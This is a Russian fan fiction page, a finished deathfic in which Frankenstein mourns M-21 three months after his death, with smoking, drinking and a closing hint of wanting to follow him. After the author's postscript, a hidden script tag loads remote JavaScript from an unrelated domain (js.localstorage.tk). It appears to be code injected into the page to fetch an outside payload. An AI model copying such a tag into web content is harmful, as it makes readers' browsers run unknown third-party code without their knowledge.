Пепел на губах

Автор: 
Balthazar_665
Персонажи: 
Франкенштейн/М-21
Рейтинг: 
G
Жанр: 
Deathfic
POV
Ангст
Слэш
Статус: 
закончен

Тихая ночь - ни чем не отличная от предыдущих. Вот только чего-то не хватает. А вернее кого-то. Тебя...

За окном метель. На улице так же холодно и пусто, как и в моей душе. Хотя, наверное, в первом случае всё же теплее. Уличный фонарь. И то мигает, затухая и вспыхивая снова. Убрать к чёрту! И луна не нужна. Мне больше ничего не нужно, а хотя… Нет, я бы хотел антибиотик от этой болезни. Я бы очень хотел обезболивающее, конечно, если такое существует для таких случаев.

Любовь... Она как Гепатит С. По другому его называют - "Ласковый убийца". Ты не чувствуешь боли, а сам всё ближе и ближе приближаешься к смерти. Счёт идёт на секунды. Конец наступает только тогда, когда всё тело бросает в жар. Потом словно молнией пробивает всё тело, ломая каждую кость, сжигая каждую клетку. Это именно она - Любовь.

Серебристые нити призрачной луны то и дело пытаются проскользнуть сквозь плотную ткань штор. Они хотят побеспокоить мой покой. Вон! Никого не хочу видеть! Ничего не хочу слышать, чувствовать… Хочу просто забыться. Всё равно как, главное, чтобы не чувствовать эту боль, словно миллионы вязальных спиц вонзились в тело, добираясь и насквозь пронизывая душу (оказывается у меня и такое есть). Как бы сейчас хотелось отвлечься.

Пустая комната. Дом тоже пустой. Спасибо за это Мастеру. Кому, как ни ему чувствовать всё, что происходит со мной сейчас. И хотя прошло три месяца, и, казалось бы, чувства должны немного притупиться, оставив место смирению и пониманию, но нет. Я до мельчайшей детали помню тот роковой день, что обернулся для всех нас кошмаром…

Вспышка молнии за окном, и я падаю в бездну…

Я не смог тебя спасти, просто не успел…

Их было слишком много. Удар! Защита! Нападение! Снова защита и снова удар! Вокруг болезненные крики и жалобные стоны.
Когда всё закончилось, я повернулся туда, где должен был стоять ты. Живой и невредимый, улыбающийся мне, нашей победе. Но я увидел только неподвижное окровавленное тело на сырой земле. Кажется, сердце пропустило удар. Помню, как кричал твоё имя. Так громко, что заложило уши, а в висках застучало болью. У тебя самое прекрасное имя, пусть немного необычное. Преодолев немалое расстояние между нами в два шага, я оказался возле тебя и упал на колени. А дальше… Дальше воспоминания проносятся рваными клочками. Помню, как прижимал к себе окровавленное и безжизненное тело. Торопливо шептал что-то глупое и непонятное, порой переходя на хрип, целовал твоё мокрое от дождя лицо задерживаясь на ресницах, собирая губами солоноватые капли. Я ненавижу тебя. Как ты посмел покинуть меня? Как посмел сдаться? Я ненавижу тебя за это, но ещё больше ненавижу себя. Не уберёг, не спрятал, не защитил…

А потом были похороны. Тогда, мне казалось, что вместе с тобой ушла часть меня, а именно та часть, что способна любить. И пусть… Зачем сердце, если нет того, для кого оно стало бы биться? Они молчали. Порой, украдкой поглядывая в мою сторону, но молчали. Что они могли сказать? Было только немое утешение, порой, совсем редко, сопровождающееся тяжёлыми вздохами (кто-то не выдерживал). Они даже не представляют, каково это - потерять любимого человека. Осознавать, что его больше нет. Что ты никогда не сможешь его поцеловать, никогда не сможешь его обнять, сидя на широком подоконнике вдвоём укрывшись большим пледом. Поругаться с ним, черт возьми, а потом подойти и обнять, чтобы снова поцеловать. Протянуть руку и провести тыльной стороной ладони по щеке, запустить пальцы в пепельные волосы и притянуть ближе, вплотную, так, чтобы его тело плотно прижималось к твоему. Больно и страшно осознавать, что ты больше не сможешь просыпаться по утрам и видеть, как в его волосах запутались лучи утреннего солнца. Не сможешь прильнуть губами к обнаженной шее и провести влажную дорожку поцелуев, сосчитывая каждый позвонок как драгоценную жемчужину, услышать довольное потягивание на смятых простынях – последствие бурной ночи. Их тоже больше не будет…

Привычный полумрак в комнате… Нет, в доме. Тихое потрескивание и пощёлкивание дров в камине, неторопливое тиканье секундной стрелки по циферблату, и судорожные вздохи, порой, сопровождающиеся всхлипами. Последнее, наверно, громче чего бы то ни было. Свет от камина падает на мое мокрое от слез лицо и слипшиеся ресницы, что отбрасывают на щеки тени. Я не помню уже, сколько так сижу. Час? Два? По-моему, больше, если судить по выкуренным пачкам сигарет, которые то и дело, помятые, болезненно сжатые в кулак, разбросаны по ковру. Опухшие и покрасневшие глаза прикованы к страстным язычкам пламени в камине. Надо же, они так тесно сплетаются и так резко и судорожно, словно впуская в лёгкие такой не достающий кислород, нехотя отрываются друг от друга. Совсем как…

Когда чувствую, что челюсть болит от сжатой в зубах сигареты, снимаю её и тяну руку к пепельнице, в которой покоятся остальные, такие же бесполезно выкуренные окурки. Горка из окурков рассыпается по стеклу журнального столика от неуклюжего движения. Или это было не случайно? Плевать... Я, горько усмехнувшись и вспомнив планы на январь (Чёрт тебя дери, наши планы… наши…), хватаю со столика стакан с наполовину не выпитым коньяком. Залпом выпив остатки содержимого в стакане, яростно бросаю его в камин, от чего плотно сдерживаемая тишина рвётся звоном разбитого стекла и беспокойным вспыхиванием огня. Черт, и снова к горлу подкатывает огромный ком слёз. И снова руки начинают дрожать, выхватывая новую сигарету и с силой сжимая в зубах. Дрожащими руками пытаюсь щёлкнуть зажигалкой, но тщетно. В конце концов, просто роняю её у ног и, потянувшись к губам, медленно убираю сигару. И снова эта противная слабость в теле.
Голова непроизвольно поворачивается в сторону окна. Потерянный и отдалённый взгляд зацепился за тонкую и светлую нить между задвинутыми шторами. Светает.…
Вскоре в комнату пробился солнечный лучик. Затем ещё один и ещё. Я поморщился и отвернулся, словно вампир, потревоженный светом дня. Глаза ещё не привыкли, да и разум отказывается воспринимать солнце. Да, впервые за это время. Встав и направившись к окну, я опасливо прикоснулся кончиками пальцев к плотной ткани штор и раздвинул их в стороны. Взгляд метнулся к рассветному розовому небу и золотым облакам.

- Ещё не всё потеряно, - в горле застрял неприятный ком, который то и дело больно давил, мешая хриплому голосу, рваться наружу. Опять прокусываю губу до крови, и от этого появляется металлический привкус во рту. Я глубоко вдыхаю, и слабо улыбнувшись, шепчу, словно успокаивая нас обоих:

- Дождись меня…

P.S:( Этот же фанфик на сайте фикбука http://ficbook.net/readfic/722382 Ставьте лайк и пишите комментарии, автору будет приятно!)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>